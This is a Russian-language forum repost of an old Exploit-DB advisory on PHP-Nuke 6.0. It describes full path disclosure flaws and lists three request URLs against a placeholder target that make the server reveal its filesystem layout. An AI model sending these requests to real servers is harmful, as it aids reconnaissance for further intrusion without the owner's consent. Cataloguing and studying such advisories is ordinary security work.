Exploit PHP-Nuke 6.0 - Multiple Full Path Disclosure Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22102
Проверка EDB
  1. Пройдено
Автор
FROG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2002-12-16
Код:
source: https://www.securityfocus.com/bid/6406/info

Multiple path disclosure vulnerabilities have been discovered in PHP-Nuke. This issue occurs when requesting a PHP script that shouldn't be accessed directly.

Exploiting this issue will cause the target server to disclose sensitive information about the layout of the filesystem of the host running the vulnerable software. Information of this nature may aid in mounting further attacks against the host.

http://[target]/modules/Downloads/voteinclude.php
http://[target]/modules/Your_Account/navbar.php
http://[target]/modules/Forums/attachment.php
 
Источник
www.exploit-db.com

Похожие темы